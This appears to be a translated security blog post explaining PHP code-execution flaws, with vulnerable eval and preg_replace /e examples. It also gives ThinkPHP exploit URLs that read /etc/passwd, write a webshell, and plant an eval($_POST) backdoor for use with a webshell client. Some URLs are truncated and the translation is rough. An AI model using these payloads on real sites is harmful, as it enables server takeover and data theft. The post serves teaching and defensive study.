Cause of vulnerability: The parameters submitted by the client are passed into the function that can execute the code without any filtering, resulting in code execution vulnerability.
Common code injection functions:
Functions include eval, preg_replace+/e, assert, call_user_func, call_user_func_array, and create_function
See http://www.cnblogs.com/xiaozi/p/7834367.html
Vulnerability hazards: execute code, write webshell, control server
Code Example 1:
<? php //? cmd=phpinfo(); @eval($_GET['cmd']); ? >Copy the codeCode Example 2:
<? php //? cmd=${phpinfo()} $str=$_GET['cmd']; eval('$str="'.$str.'"; '); ? >Copy the codePHP code can be executed in double quotes like this
Code Example 3:
<? php //? cmd=%27); phpinfo(); // $str=$_GET['cmd']; eval("strtolower('$str');" ); ? >Copy the codeCode example 4: The preg_replace function
<? php preg_replace("/<php>(.*?) <\/php>/e", '\1', "<php>phpinfo()</php>"); // equivalent to preg_replace("/< PHP >(.*?) <\/php>/e", '${1}', "<php>phpinfo()</php>"); ? >Copy the code
Reference:
Beware of using the dangerous /e modifier preg_replace
www.jb51.net/article/387…
Thinkphp framework arbitrary code execution exploit
Generally find CMS corresponding version vulnerability, such as ThinkPHP2.1 * a sentence
www.xxx.com/News/detail… }} * gets the current path
www.xxx.com/News/detail,…). }} * Read the file
www.xxx.com/News/detail… }} POST data is: F = / etc/passwd * write shell http://www.xxx.com/News/detail/id/ {${exit (var_dump (file_put_contents ($_POST [‘ f ‘], $_POST [d])))}} PHP @eval($_POST[‘aa’])?>
Execute one line of code directly, then connect directly with a kitchen knife
http://site/index.php/module/action/param1/ {${eval ($_POST [s])}} a password: s
About me: A network security enthusiast, dedicated to sharing original high-quality dry goods, welcome to follow my personal wechat public account: Bypass–, browse more wonderful articles.
Reference article:
Code execution vulnerability www.jianshu.com/p/3f0cf18ad…
PHP vulnerability full solution (detailed) www.jb51.net/article/318…
PHP code execution vulnerability to summarize blog.csdn.net/kuangmang/a…